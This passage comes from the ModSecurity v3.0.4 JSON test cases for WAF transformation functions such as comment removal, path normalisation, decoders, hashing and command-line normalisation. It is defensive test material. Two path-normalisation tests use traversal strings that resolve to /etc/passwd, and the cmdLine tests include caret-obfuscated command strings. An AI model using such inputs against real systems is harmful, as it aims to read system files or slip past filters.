"output" : "TestCase", "type" : "tfn", "input" : "\\x00Test\\x00Case\\x00", "name" : "removeNulls", "ret" : 1 } ] modsecurity-v3.0.4/test/test-cases/secrules-language-tests/transformations/removeCommentsChar.json0000644000175000017500000000640213607066311034237 0ustar zimmerlezimmerle[ { "output" : "", "input" : "", "type" : "tfn", "name" : "removeCommentsChar", "ret" : 1 }, { "input" : "TestCase", "type" : "tfn", "name" : "removeCommentsChar", "ret" : 1, "output" : "TestCase" }, { "ret" : 1, "input" : "Test\\u0000Case", "name" : "removeCommentsChar", "type" : "tfn", "output" : "Test\\u0000Case" }, { "ret" : 1, "input" : "/* TestCase */", "name" : "removeCommentsChar", "type" : "tfn", "output" : " TestCase " }, { "output" : "TestCase", "ret" : 1, "type" : "tfn", "input" : "/*TestCase*/", "name" : "removeCommentsChar" }, { "input" : "/* TestCase*/", "type" : "tfn", "name" : "removeCommentsChar", "ret" : 1, "output" : " TestCase" }, { "output" : "TestCase ", "ret" : 1, "name" : "removeCommentsChar", "input" : "/*TestCase */", "type" : "tfn" }, { "output" : "Before TestCase After", "ret" : 1, "type" : "tfn", "input" : "Before/* TestCase */After", "name" : "removeCommentsChar" }, { "output" : "Before TestCase After", "name" : "removeCommentsChar", "input" : "Before /* TestCase */ After", "type" : "tfn", "ret" : 1 }, { "type" : "tfn", "input" : "/* Test\\nCase */", "name" : "removeCommentsChar", "ret" : 1, "output" : " Test\\nCase " }, { "name" : "removeCommentsChar", "input" : "/* Test\r\nCase */", "type" : "tfn", "ret" : 1, "output" : " Test\r\nCase " }, { "ret" : 1, "input" : "/* Test\nCase */", "type" : "tfn", "name" : "removeCommentsChar", "output" : " Test\nCase " }, { "ret" : 1, "name" : "removeCommentsChar", "input" : "/* Test\rCase */", "type" : "tfn", "output" : " Test\rCase " }, { "ret" : 1, "input" : "Before/* Test\r\nCase ", "type" : "tfn", "name" : "removeCommentsChar", "output" : "Before Test\r\nCase " }, { "output" : "Before Test\nCase ", "input" : "Before /* Test\nCase ", "type" : "tfn", "name" : "removeCommentsChar", "ret" : 1 }, { "output" : "Before Test\r\nCase ", "ret" : 1, "input" : "Before/* Test\r\nCase ", "name" : "removeCommentsChar", "type" : "tfn" }, { "input" : "Before /* Test\nCase ", "name" : "removeCommentsChar", "type" : "tfn", "ret" : 1, "output" : "Before Test\nCase " }, { "ret" : 1, "name" : "removeCommentsChar", "input" : "Test\r\nCase */After", "type" : "tfn", "output" : "Test\r\nCase After" }, { "output" : "Test\nCase After", "name" : "removeCommentsChar", "input" : "Test\nCase */ After", "type" : "tfn", "ret" : 1 }, { "output" : "Test\r\nCase After", "ret" : 1, "name" : "removeCommentsChar", "input" : "Test\r\nCase */After", "type" : "tfn" }, { "input" : "Test\nCase */ After", "name" : "removeCommentsChar", "type" : "tfn", "ret" : 1, "output" : "Test\nCase After" } ] modsecurity-v3.0.4/test/test-cases/secrules-language-tests/transformations/removeComments.json0000644000175000017500000000616113607066311033443 0ustar zimmerlezimmerle[ { "output" : "", "input" : "", "type" : "tfn", "name" : "removeComments", "ret" : 1 }, { "input" : "TestCase", "type" : "tfn", "name" : "removeComments", "ret" : 1, "output" : "TestCase" }, { "ret" : 1, "input" : "Test\\u0000Case", "name" : "removeComments", "type" : "tfn", "output" : "Test\\u0000Case" }, { "ret" : 1, "input" : "/* TestCase */", "name" : "removeComments", "type" : "tfn", "output" : "\\x00" }, { "output" : "\\x00", "ret" : 1, "type" : "tfn", "input" : "/*TestCase*/", "name" : "removeComments" }, { "input" : "/* TestCase*/", "type" : "tfn", "name" : "removeComments", "ret" : 1, "output" : "\\x00" }, { "output" : "\\x00", "ret" : 1, "name" : "removeComments", "input" : "/*TestCase */", "type" : "tfn" }, { "output" : "BeforeAfter", "ret" : 1, "type" : "tfn", "input" : "Before/* TestCase */After", "name" : "removeComments" }, { "output" : "Before TestCase */ After", "name" : "removeComments", "input" : "Before TestCase */ After", "type" : "tfn", "ret" : 1 }, { "type" : "tfn", "input" : "/* Test\\nCase */", "name" : "removeComments", "ret" : 1, "output" : "\\x00" }, { "name" : "removeComments", "input" : "/* Test\r\nCase */", "type" : "tfn", "ret" : 1, "output" : "\\x00" }, { "ret" : 1, "input" : "/* Test\nCase */", "type" : "tfn", "name" : "removeComments", "output" : "\\x00" }, { "ret" : 1, "name" : "removeComments", "input" : "/* Test\rCase */", "type" : "tfn", "output" : "\\x00" }, { "ret" : 1, "input" : "/*Before/* Test\r\nCase ", "type" : "tfn", "name" : "removeComments", "output" : " " }, { "output" : "Before ", "input" : "Before /* Test\nCase ", "type" : "tfn", "name" : "removeComments", "ret" : 1 }, { "output" : "Before \r\nCase ", "ret" : 1, "input" : "Before/* T*/ /* e */ /* s */ /* t */\r\nCase ", "name" : "removeComments", "type" : "tfn" }, { "input" : "Before /* */ ops */ Test\nCase ", "name" : "removeComments", "type" : "tfn", "ret" : 1, "output" : "Before ops */ Test\nCase " }, { "ret" : 1, "name" : "removeComments", "input" : "/*Test\r\nCase */After", "type" : "tfn", "output" : "After" }, { "output" : "Test\nCase After", "name" : "removeComments", "input" : "Test\nCase /**/ After", "type" : "tfn", "ret" : 1 }, { "output" : "Test\r\nCase */After", "ret" : 1, "name" : "removeComments", "input" : "Test\r\nCase */After", "type" : "tfn" }, { "input" : "Test/*\nCase */ After", "name" : "removeComments", "type" : "tfn", "ret" : 1, "output" : "Test After" } ] modsecurity-v3.0.4/test/test-cases/secrules-language-tests/transformations/parityZero7bit.json0000644000175000017500000000144313607066311033374 0ustar zimmerlezimmerle[ { "output" : "", "ret" : 0, "input" : "", "type" : "tfn", "name" : "parityZero7bit" }, { "output" : "abcdefghijklmnopqrstuvwxyz0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ", "ret" : 0, "input" : "abcdefghijklmnopqrstuvwxyz0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ", "name" : "parityZero7bit", "type" : "tfn" }, { "output" : "abcdefghijklmnopqrstuvwxyz\\u00000123456789\\u0000ABCDEFGHIJKLMNOPQRSTUVWXYZ", "ret" : 0, "input" : "abcdefghijklmnopqrstuvwxyz\\u00000123456789\\u0000ABCDEFGHIJKLMNOPQRSTUVWXYZ", "type" : "tfn", "name" : "parityZero7bit" }, { "output" : "B\\x00\\x00B\\x0fC?", "ret" : 1, "input" : "€\\u0000ÿ", "type" : "tfn", "name" : "parityZero7bit" } ] modsecurity-v3.0.4/test/test-cases/secrules-language-tests/transformations/parityOdd7bit.json0000644000175000017500000000205713607066311033165 0ustar zimmerlezimmerle[ { "output" : "", "ret" : 0, "input" : "", "type" : "tfn", "name" : "parityOdd7bit" }, { "output" : "abdghkmnpsuvyz12478CEFIJLOQRTW", "ret" : 0, "input" : "abdghkmnpsuvyz12478CEFIJLOQRTW", "type" : "tfn", "name" : "parityOdd7bit" }, { "output" : "ab\\xe3d\\xe5\\xe6gh\\xe9\\xeak\\xecmn\\xefp\\xf1\\xf2s\\xf4uv\\xf7\\xf8yz\\xb012\\xb34\\xb5\\xb678\\xb9\\xc1\\xc2C\\xc4EF\\xc7\\xc8IJ\\xcbL\\xcd\\xceO\\xd0QR\\xd3T\\xd5\\xd6WX\\xd9\\xda", "ret" : 1, "type" : "tfn", "input" : "abcdefghijklmnopqrstuvwxyz0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ", "name" : "parityOdd7bit" }, { "output" : "ab\\xe3d\\xe5\\xe6gh\\xe9\\xeak\\xecmn\\xefp\\xf1\\xf2s\\xf4uv\\xf7\\xf8yz\\x80\\xb012\\xb34\\xb5\\xb678\\xb9\\x80\\xc1\\xc2C\\xc4EF\\xc7\\xc8IJ\\xcbL\\xcd\\xceO\\xd0QR\\xd3T\\xd5\\xd6WX\\xd9\\xda", "name" : "parityOdd7bit", "input" : "abcdefghijklmnopqrstuvwxyz\\u00000123456789\\u0000ABCDEFGHIJKLMNOPQRSTUVWXYZ", "type" : "tfn", "ret" : 1 } ] modsecurity-v3.0.4/test/test-cases/secrules-language-tests/transformations/parityEven7bit.json0000644000175000017500000000206513607066311033353 0ustar zimmerlezimmerle[ { "name" : "parityEven7bit", "input" : "", "type" : "tfn", "ret" : 0, "output" : "" }, { "output" : "cefijloqrtwx03569ABDGHKMNPSUVYZ", "ret" : 0, "name" : "parityEven7bit", "input" : "cefijloqrtwx03569ABDGHKMNPSUVYZ", "type" : "tfn" }, { "output" : "\\xe1\\xe2c\\xe4ef\\xe7\\xe8ij\\xebl\\xed\\xeeo\\xf0qr\\xf3t\\xf5\\xf6wx\\xf9\\xfa0\\xb1\\xb23\\xb456\\xb7\\xb89AB\\xc3D\\xc5\\xc6GH\\xc9\\xcaK\\xccMN\\xcfP\\xd1\\xd2S\\xd4UV\\xd7\\xd8YZ", "name" : "parityEven7bit", "input" : "abcdefghijklmnopqrstuvwxyz0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ", "type" : "tfn", "ret" : 1 }, { "output" : "\\xe1\\xe2c\\xe4ef\\xe7\\xe8ij\\xebl\\xed\\xeeo\\xf0qr\\xf3t\\xf5\\xf6wx\\xf9\\xfa\\x000\\xb1\\xb23\\xb456\\xb7\\xb89\\x00AB\\xc3D\\xc5\\xc6GH\\xc9\\xcaK\\xccMN\\xcfP\\xd1\\xd2S\\xd4UV\\xd7\\xd8YZ", "input" : "abcdefghijklmnopqrstuvwxyz\\u00000123456789\\u0000ABCDEFGHIJKLMNOPQRSTUVWXYZ", "type" : "tfn", "name" : "parityEven7bit", "ret" : 1 } ] modsecurity-v3.0.4/test/test-cases/secrules-language-tests/transformations/normalisePathWin.json0000644000175000017500000001132013607066311033715 0ustar zimmerlezimmerle[ { "output" : "", "input" : "", "name" : "normalisePathWin", "type" : "tfn", "ret" : 0 }, { "output" : "/foo/bar/baz", "ret" : 1, "name" : "normalisePathWin", "input" : "\\foo\\bar\\baz", "type" : "tfn" }, { "type" : "tfn", "input" : "\\foo\\bar\\u0000\\baz", "name" : "normalisePathWin", "ret" : 1, "output" : "/foo/bar\\u0000/baz" }, { "output" : "x", "name" : "normalisePathWin", "input" : "x", "type" : "tfn", "ret" : 0 }, { "ret" : 1, "type" : "tfn", "input" : ".", "name" : "normalisePathWin", "output" : "" }, { "output" : "", "input" : ".\\", "type" : "tfn", "name" : "normalisePathWin", "ret" : 1 }, { "type" : "tfn", "input" : ".\\..", "name" : "normalisePathWin", "ret" : 1, "output" : ".." }, { "name" : "normalisePathWin", "input" : ".\\..\\", "type" : "tfn", "ret" : 1, "output" : "../" }, { "type" : "tfn", "input" : "..", "name" : "normalisePathWin", "ret" : 0, "output" : ".." }, { "ret" : 1, "input" : "..\\", "name" : "normalisePathWin", "type" : "tfn", "output" : "../" }, { "name" : "normalisePathWin", "input" : "..\\.", "type" : "tfn", "ret" : 1, "output" : ".." }, { "input" : "..\\.\\", "type" : "tfn", "name" : "normalisePathWin", "ret" : 1, "output" : "../" }, { "output" : "../..", "input" : "..\\..", "type" : "tfn", "name" : "normalisePathWin", "ret" : 1 }, { "ret" : 1, "input" : "..\\..\\", "name" : "normalisePathWin", "type" : "tfn", "output" : "../../" }, { "ret" : 1, "name" : "normalisePathWin", "input" : "\\dir\\foo\\\\bar", "type" : "tfn", "output" : "/dir/foo/bar" }, { "output" : "dir/foo/bar/", "ret" : 1, "type" : "tfn", "input" : "dir\\foo\\\\bar\\", "name" : "normalisePathWin" }, { "output" : "foo", "input" : "dir\\..\\foo", "name" : "normalisePathWin", "type" : "tfn", "ret" : 1 }, { "type" : "tfn", "input" : "dir\\..\\..\\foo", "name" : "normalisePathWin", "ret" : 1, "output" : "../foo" }, { "ret" : 1, "type" : "tfn", "input" : "dir\\.\\..\\.\\..\\..\\foo\\bar", "name" : "normalisePathWin", "output" : "../../foo/bar" }, { "output" : "../../foo/bar", "input" : "dir\\.\\..\\.\\..\\..\\foo\\bar\\.", "type" : "tfn", "name" : "normalisePathWin", "ret" : 1 }, { "input" : "dir\\.\\..\\.\\..\\..\\foo\\bar\\.\\", "type" : "tfn", "name" : "normalisePathWin", "ret" : 1, "output" : "../../foo/bar/" }, { "input" : "dir\\.\\..\\.\\..\\..\\foo\\bar\\..", "name" : "normalisePathWin", "type" : "tfn", "ret" : 1, "output" : "../../foo" }, { "ret" : 1, "name" : "normalisePathWin", "input" : "dir\\.\\..\\.\\..\\..\\foo\\bar\\..\\", "type" : "tfn", "output" : "../../foo/" }, { "output" : "../../foo/bar/", "input" : "dir\\.\\..\\.\\..\\..\\foo\\bar\\", "name" : "normalisePathWin", "type" : "tfn", "ret" : 1 }, { "output" : "../../foo/bar", "input" : "dir\\\\.\\\\..\\\\.\\\\..\\\\..\\\\foo\\\\bar", "name" : "normalisePathWin", "type" : "tfn", "ret" : 1 }, { "output" : "../../foo/bar/", "name" : "normalisePathWin", "input" : "dir\\\\.\\\\..\\\\.\\\\..\\\\..\\\\foo\\\\bar\\\\", "type" : "tfn", "ret" : 1 }, { "input" : "dir\\subdir\\subsubdir\\subsubsubdir\\..\\..\\..", "type" : "tfn", "name" : "normalisePathWin", "ret" : 1, "output" : "dir" }, { "ret" : 1, "type" : "tfn", "input" : "dir\\.\\subdir\\.\\subsubdir\\.\\subsubsubdir\\..\\..\\..", "name" : "normalisePathWin", "output" : "dir" }, { "input" : "dir\\.\\subdir\\..\\subsubdir\\..\\subsubsubdir\\..", "name" : "normalisePathWin", "type" : "tfn", "ret" : 1, "output" : "dir" }, { "output" : "/dir/", "ret" : 1, "input" : "\\dir\\.\\subdir\\..\\subsubdir\\..\\subsubsubdir\\..\\", "type" : "tfn", "name" : "normalisePathWin" }, { "output" : "/etc/passwd", "ret" : 1, "input" : "\\.\\..\\.\\..\\..\\..\\..\\..\\..\\..\\\\0\\..\\etc\\.\\passwd", "name" : "normalisePathWin", "type" : "tfn" } ] modsecurity-v3.0.4/test/test-cases/secrules-language-tests/transformations/normalisePath.json0000644000175000017500000001073413607066311033247 0ustar zimmerlezimmerle[ { "ret" : 0, "input" : "", "name" : "normalisePath", "type" : "tfn", "output" : "" }, { "name" : "normalisePath", "input" : "/foo/bar/baz", "type" : "tfn", "ret" : 0, "output" : "/foo/bar/baz" }, { "ret" : 0, "input" : "/foo/bar\\u0000/baz", "name" : "normalisePath", "type" : "tfn", "output" : "/foo/bar\\u0000/baz" }, { "name" : "normalisePath", "input" : "x", "type" : "tfn", "ret" : 0, "output" : "x" }, { "output" : "", "name" : "normalisePath", "input" : ".", "type" : "tfn", "ret" : 1 }, { "output" : "", "ret" : 1, "type" : "tfn", "input" : "./", "name" : "normalisePath" }, { "ret" : 1, "input" : "./..", "name" : "normalisePath", "type" : "tfn", "output" : ".." }, { "ret" : 1, "input" : "./../", "name" : "normalisePath", "type" : "tfn", "output" : "../" }, { "output" : "..", "ret" : 0, "input" : "..", "name" : "normalisePath", "type" : "tfn" }, { "output" : "../", "ret" : 0, "input" : "../", "name" : "normalisePath", "type" : "tfn" }, { "output" : "..", "input" : "../.", "name" : "normalisePath", "type" : "tfn", "ret" : 1 }, { "name" : "normalisePath", "input" : ".././", "type" : "tfn", "ret" : 1, "output" : "../" }, { "ret" : 0, "input" : "../..", "name" : "normalisePath", "type" : "tfn", "output" : "../.." }, { "ret" : 0, "type" : "tfn", "input" : "../../", "name" : "normalisePath", "output" : "../../" }, { "name" : "normalisePath", "input" : "/dir/foo//bar", "type" : "tfn", "ret" : 1, "output" : "/dir/foo/bar" }, { "input" : "dir/foo//bar/", "type" : "tfn", "name" : "normalisePath", "ret" : 1, "output" : "dir/foo/bar/" }, { "output" : "foo", "ret" : 1, "input" : "dir/../foo", "type" : "tfn", "name" : "normalisePath" }, { "output" : "../foo", "type" : "tfn", "input" : "dir/../../foo", "name" : "normalisePath", "ret" : 1 }, { "ret" : 1, "input" : "dir/./.././../../foo/bar", "name" : "normalisePath", "type" : "tfn", "output" : "../../foo/bar" }, { "output" : "../../foo/bar", "type" : "tfn", "input" : "dir/./.././../../foo/bar/.", "name" : "normalisePath", "ret" : 1 }, { "output" : "../../foo/bar/", "ret" : 1, "input" : "dir/./.././../../foo/bar/./", "name" : "normalisePath", "type" : "tfn" }, { "input" : "dir/./.././../../foo/bar/..", "name" : "normalisePath", "type" : "tfn", "ret" : 1, "output" : "../../foo" }, { "output" : "../../foo/", "ret" : 1, "input" : "dir/./.././../../foo/bar/../", "name" : "normalisePath", "type" : "tfn" }, { "ret" : 1, "name" : "normalisePath", "input" : "dir/./.././../../foo/bar/", "type" : "tfn", "output" : "../../foo/bar/" }, { "output" : "../../foo/bar", "name" : "normalisePath", "input" : "dir//.//..//.//..//..//foo//bar", "type" : "tfn", "ret" : 1 }, { "name" : "normalisePath", "input" : "dir//.//..//.//..//..//foo//bar//", "type" : "tfn", "ret" : 1, "output" : "../../foo/bar/" }, { "output" : "dir", "ret" : 1, "input" : "dir/subdir/subsubdir/subsubsubdir/../../..", "name" : "normalisePath", "type" : "tfn" }, { "ret" : 1, "type" : "tfn", "input" : "dir/./subdir/./subsubdir/./subsubsubdir/../../..", "name" : "normalisePath", "output" : "dir" }, { "ret" : 1, "input" : "dir/./subdir/../subsubdir/../subsubsubdir/..", "type" : "tfn", "name" : "normalisePath", "output" : "dir" }, { "type" : "tfn", "input" : "/dir/./subdir/../subsubdir/../subsubsubdir/../", "name" : "normalisePath", "ret" : 1, "output" : "/dir/" }, { "output" : "/etc/passwd", "ret" : 1, "type" : "tfn", "input" : "/./.././../../../../../../../\\u0000/../etc/./passwd", "name" : "normalisePath" } ] modsecurity-v3.0.4/test/test-cases/secrules-language-tests/transformations/md5.json0000644000175000017500000000165713607066311031132 0ustar zimmerlezimmerle[ { "output" : "-Se\\x90)-B~N\\x14\\x82\\x9aE\\xbc\\xfe\\x89", "ret" : 1, "input" : "zimmerle", "type" : "tfn", "name" : "md5" }, { "output" : "\\xd4\\x1d\\x8c\\xd9\\x8f\\x00\\xb2\\x04\\xe9\\x80\\x09\\x98\\xec\\xf8B~", "ret" : 1, "input" : "", "type" : "tfn", "name" : "md5" }, { "output" : "\\xc16\\x83Y\\xaa)(\\xa50\\xb5\\x00\\x07\\xd1\\xde\\xeaw", "ret" : 1, "input" : "진 마 리", "name" : "md5", "type" : "tfn" }, { "output" : "\\xa6\\xe7\\xd3\\xb4o\\xdf\\xaf\\x0b\\xde*\\x1f\\x83*\\x00\\xd2\\xde", "ret" : 1, "input" : "\\x00\\x01\\x02\\x03\\x04\\x05\\x06\\x07\\x08", "name" : "md5", "type" : "tfn" }, { "input" : "TestCase", "type" : "tfn", "name" : "md5", "ret" : 1, "output" : "\\xc9\\xab\\xa2\\xc3\\xe6\\x01&\\x16\\x9e\\x80\\xe9\\xa2k\\xa2s\\xc1" } ] modsecurity-v3.0.4/test/test-cases/secrules-language-tests/transformations/lowercase.json0000644000175000017500000000125113607066311032417 0ustar zimmerlezimmerle[ { "input" : "", "name" : "lowercase", "type" : "tfn", "ret" : 0, "output" : "" }, { "output" : "testcase", "ret" : 0, "name" : "lowercase", "input" : "testcase", "type" : "tfn" }, { "ret" : 0, "input" : "test\u0000case", "type" : "tfn", "name" : "lowercase", "output" : "test\u0000case" }, { "output" : "testcase", "input" : "TestCase", "name" : "lowercase", "type" : "tfn", "ret" : 1 }, { "ret" : 1, "input" : "Test\u0000Case", "name" : "lowercase", "type" : "tfn", "output" : "test\u0000case" } ] modsecurity-v3.0.4/test/test-cases/secrules-language-tests/transformations/length.json0000644000175000017500000000100613607066311031712 0ustar zimmerlezimmerle[ { "output" : "0", "input" : "", "type" : "tfn", "name" : "length", "ret" : 1 }, { "output" : "16", "ret" : 1, "input" : "0123456789abcdef", "type" : "tfn", "name" : "length" }, { "ret" : 1, "input" : "0123456789\tabcdef", "name" : "length", "type" : "tfn", "output" : "17" }, { "output" : "9", "input" : "Test\\u0000Case", "type" : "tfn", "name" : "length", "ret" : 1 } ] modsecurity-v3.0.4/test/test-cases/secrules-language-tests/transformations/jsDecode.json0000644000175000017500000000415313607066311032157 0ustar zimmerlezimmerle[ { "output" : "", "ret" : 0, "input" : "", "name" : "jsDecode", "type" : "tfn" }, { "output" : "TestCase", "ret" : 0, "type" : "tfn", "input" : "TestCase", "name" : "jsDecode" }, { "ret" : 0, "input" : "Test\u0000Case", "type" : "tfn", "name" : "jsDecode", "output" : "Test\u0000Case" }, { "input" : "\\\\a\\\\b\\\\f\\\\n\\\\r\\\\t\\\\v\\?\\'\\\"\\0\\12\\123\\x00\\xff", "output" : "\\a\\b\\f\\n\\r\\t\\v?'\"\\x00\\x0a\\x53\\x00\\xff", "ret" : 1, "type" : "tfn", "name" : "jsDecode" }, { "output" : "8966\\x0a\\x00\\x00\\x00\\x0a\\x0a\\x0a3u00a", "input" : "8966\\x0a\\x00\\x00\\x00\\x0a\\x0a\\x0a3u00a", "type" : "tfn", "name" : "jsDecode", "ret" : 1 }, { "input" : "\\x", "name" : "jsDecode", "type" : "tfn", "ret" : 1, "output" : "x" }, { "output" : "xx0", "ret" : 1, "name" : "jsDecode", "input" : "\\x\\x0", "type" : "tfn" }, { "output" : "xx0\u0000", "type" : "tfn", "input" : "\\x\\x0\u0000", "name" : "jsDecode", "ret" : 1 }, { "output" : "u", "input" : "\\u", "name" : "jsDecode", "type" : "tfn", "ret" : 1 }, { "input" : "\\u\\u0", "name" : "jsDecode", "type" : "tfn", "ret" : 1, "output" : "uu0" }, { "ret" : 1, "type" : "tfn", "input" : "\\u\\u0\\u01", "name" : "jsDecode", "output" : "uu0u01" }, { "input" : "\\u\\u0\\u01\\u012", "type" : "tfn", "name" : "jsDecode", "ret" : 1, "output" : "uu0u01u012" }, { "ret" : 1, "input" : "\\u\\u0\\u01\\u012\u0000", "type" : "tfn", "name" : "jsDecode", "output" : "uu0u01u012\u0000" }, { "input" : "\\", "type" : "tfn", "name" : "jsDecode", "ret" : 0, "output" : "\\" }, { "output" : "\\0", "ret" : 1, "input" : "\\\\0", "type" : "tfn", "name" : "jsDecode" } ] modsecurity-v3.0.4/test/test-cases/secrules-language-tests/transformations/htmlEntityDecode.json0000644000175000017500000000257613607066311033713 0ustar zimmerlezimmerle[ { "name" : "htmlEntityDecode", "input" : "", "type" : "tfn", "ret" : 0, "output" : "" }, { "output" : "TestCase", "ret" : 0, "input" : "TestCase", "type" : "tfn", "name" : "htmlEntityDecode" }, { "ret" : 0, "type" : "tfn", "input" : "Test\\u0000Case", "name" : "htmlEntityDecode", "output" : "Test\\u0000Case" }, { "output" : "&#xg;&#Xg;&#xg0;\\u0002g;&#a;\\u0000&#a2;\\u0003a&#a00;\\u0001a0;\na;&foo;", "ret" : 1, "input" : "&#xg;&#Xg;&#xg0;g;&#a;\\u0000&#a2;a&#a00;a0; a;&foo;", "type" : "tfn", "name" : "htmlEntityDecode" }, { "ret" : 1, "name" : "htmlEntityDecode", "input" : "&#xg&#Xg&#xg0g&#a\\u0000&#a2a&#a00a0 a&foo", "type" : "tfn", "output" : "&#xg&#Xg&#xg0\\u0002g&#a\\u0000&#a2\\u0003a&#a00\\u0001a0\na&foo" }, { "output" : "\\x00\\x00\\x20\\x20\\x00\\x20\\x00\\x64\"&<>\\xa0", "type" : "tfn", "input" : "�� � \\u0000d"&<> ", "name" : "htmlEntityDecode", "ret" : 1 }, { "output" : "\\x00\\x00\\x20\\x20\\x00\\x20\\x00\\x64\"&<>\\xa0", "ret" : 1, "name" : "htmlEntityDecode", "input" : "�� � \\x00d"&<> ", "type" : "tfn" } ] modsecurity-v3.0.4/test/test-cases/secrules-language-tests/transformations/hexEncode.json0000644000175000017500000000063613607066311032343 0ustar zimmerlezimmerle[ { "ret" : 1, "input" : "", "type" : "tfn", "name" : "hexEncode", "output" : "" }, { "output" : "5465737443617365", "ret" : 1, "name" : "hexEncode", "input" : "TestCase", "type" : "tfn" }, { "output" : "546573740043617365", "name" : "hexEncode", "input" : "Test\\u0000Case", "type" : "tfn", "ret" : 1 } ] modsecurity-v3.0.4/test/test-cases/secrules-language-tests/transformations/hexDecode.json0000644000175000017500000000160713607066311032330 0ustar zimmerlezimmerle[ { "ret" : 1, "input" : "", "type" : "tfn", "name" : "hexDecode", "output" : "" }, { "output" : "TestCase", "ret" : 1, "name" : "hexDecode", "input" : "5465737443617365", "type" : "tfn" }, { "type" : "tfn", "input" : "546573740043617365", "name" : "hexDecode", "ret" : 1, "output" : "Test\\u0000Case" }, { "output" : "\\x01#Eg\\x89\\x0a#\\x01#Eg\\x89\\x0a", "type" : "tfn", "input" : "01234567890a0z01234567890a", "name" : "hexDecode", "ret" : 1 }, { "type" : "tfn", "name" : "hexDecode", "input" : "01234567890az", "output" : "\\x01#Eg\\x89\\x0a", "ret" : 1 }, { "type" : "tfn", "name" : "hexDecode", "input" : "01234567890a0", "output" : "\\x01#Eg\\x89\\x0a", "ret" : 1 } ] modsecurity-v3.0.4/test/test-cases/secrules-language-tests/transformations/escapeSeqDecode.json0000644000175000017500000000413013607066311033447 0ustar zimmerlezimmerle[ { "output" : "", "type" : "tfn", "input" : "", "name" : "escapeSeqDecode", "ret" : 0 }, { "name" : "escapeSeqDecode", "input" : "TestCase", "type" : "tfn", "ret" : 0, "output" : "TestCase" }, { "output" : "Test\\u0000Case", "ret" : 0, "type" : "tfn", "input" : "Test\\u0000Case", "name" : "escapeSeqDecode" }, { "ret" : 1, "input" : "\\a\\b\\f\\n\\r\\t\\v\\?\\'\\\"\\0\\12\\123\\x00\\xff", "name" : "escapeSeqDecode", "type" : "tfn", "output" : "\u0007\b\f\n\r\t\u000b?'\"\\u0000\nS\\u0000\\xff" }, { "ret" : 1, "type" : "tfn", "input" : "\\a\\b\\f\\n\\r\\t\\v\\u0000\\?\\'\\\"\\0\\12\\123\\x00\\xff", "name" : "escapeSeqDecode", "output" : "\u0007\b\f\n\r\t\u000b\\u0000?'\"\\u0000\nS\\u0000\\xff" }, { "input" : "\\8\\9\\666\\xag\\xga\\0123", "type" : "tfn", "name" : "escapeSeqDecode", "ret" : 1, "output" : "89\\xb6\\xag\\xga\\x0a3" }, { "output" : "x", "type" : "tfn", "input" : "\\x", "name" : "escapeSeqDecode", "ret" : 1 }, { "name" : "escapeSeqDecode", "input" : "\\x\\x0", "type" : "tfn", "ret" : 1, "output" : "xx0" }, { "output" : "xx0\\u0000", "name" : "escapeSeqDecode", "input" : "\\x\\x0\\u0000", "type" : "tfn", "ret" : 1 }, { "name" : "escapeSeqDecode", "input" : "\\0", "type" : "tfn", "ret" : 1, "output" : "\\u0000" }, { "output" : "\u0001", "ret" : 1, "input" : "\\01", "name" : "escapeSeqDecode", "type" : "tfn" }, { "ret" : 1, "name" : "escapeSeqDecode", "input" : "\\012", "type" : "tfn", "output" : "\n" }, { "ret" : 0, "type" : "tfn", "input" : "\\", "name" : "escapeSeqDecode", "output" : "\\" }, { "input" : "\\\\u0000", "type" : "tfn", "name" : "escapeSeqDecode", "ret" : 1, "output" : "\\u0000" } ] modsecurity-v3.0.4/test/test-cases/secrules-language-tests/transformations/cssDecode.json0000644000175000017500000000174313607066311032335 0ustar zimmerlezimmerle[ { "input" : "", "output" : "", "name" : "cssDecode", "ret" : 0, "type" : "tfn" }, { "output" : "TestCase", "name" : "cssDecode", "input" : "TestCase", "ret" : 0, "type" : "tfn" }, { "input" : "Test\u0000Case", "output" : "Test\u0000Case", "name" : "cssDecode", "ret" : 0, "type" : "tfn" }, { "type" : "tfn", "ret" : 1, "input" : "test\\a\\b\\f\\n\\r\\t\\v\\?\\'\\\"\\\u0000\\12\\123\\1234\\12345\\123456\\ff01\\ff5e\\\n\\\u0000 string", "name" : "cssDecode", "output" : "test\n\u000b\u000fnrtv?'\"\u0000\u0012#4EV!~\u0000 string" }, { "input" : "test\\", "output" : "test", "name" : "cssDecode", "ret" : 1, "type" : "tfn" }, { "type" : "tfn", "ret" : 1, "input" : "\\1A\\1 A\\1234567\\123456 7\\1x\\1 x", "name" : "cssDecode", "output" : "\u001a\u0001AV7V7\u0001x\u0001x" } ] modsecurity-v3.0.4/test/test-cases/secrules-language-tests/transformations/compressWhitespace.json0000644000175000017500000000213013607066311034300 0ustar zimmerlezimmerle[ { "ret" : 0, "name" : "compressWhitespace", "input" : "", "type" : "tfn", "output" : "" }, { "ret" : 0, "type" : "tfn", "input" : "TestCase", "name" : "compressWhitespace", "output" : "TestCase" }, { "name" : "compressWhitespace", "input" : "Test\\u0000Case", "type" : "tfn", "ret" : 0, "output" : "Test\\u0000Case" }, { "output" : "Test Case", "ret" : 0, "type" : "tfn", "input" : "Test Case", "name" : "compressWhitespace" }, { "output" : " Test Case ", "ret" : 1, "input" : " Test \t Case ", "name" : "compressWhitespace", "type" : "tfn" }, { "name" : "compressWhitespace", "input" : "This is a test case with a tab \t, vtab \u000b, newline \n, return \r, formfeed \f, and a NUL\\u0000 in it with a CRLF at the end.\r\n", "type" : "tfn", "ret" : 1, "output" : "This is a test case with a tab , vtab , newline , return , formfeed , and a NUL\\u0000 in it with a CRLF at the end. " } ] modsecurity-v3.0.4/test/test-cases/secrules-language-tests/transformations/cmdLine.json0000644000175000017500000000146413607066311032014 0ustar zimmerlezimmerle[ { "name" : "cmd_line", "input" : "", "type" : "tfn", "ret" : 0, "output" : "" }, { "name" : "cmd_line", "input" : "test", "type" : "tfn", "ret" : 1, "output" : "test" }, { "name" : "cmd_line", "input" : "C^OMMAND /C DIR", "type" : "tfn", "ret" : 1, "output" : "command/c dir" }, { "name" : "cmd_line", "input" : "C^oMMaNd /C DiR", "type" : "tfn", "ret" : 1, "output" : "command/c dir" }, { "name" : "cmd_line", "input" : "cmd,/c DiR", "type" : "tfn", "ret" : 1, "output" : "cmd/c dir" }, { "name" : "cmd_line", "input" : "\"command\" /c DiR", "type" : "tfn", "ret" : 1, "output" : "command/c dir" } ] 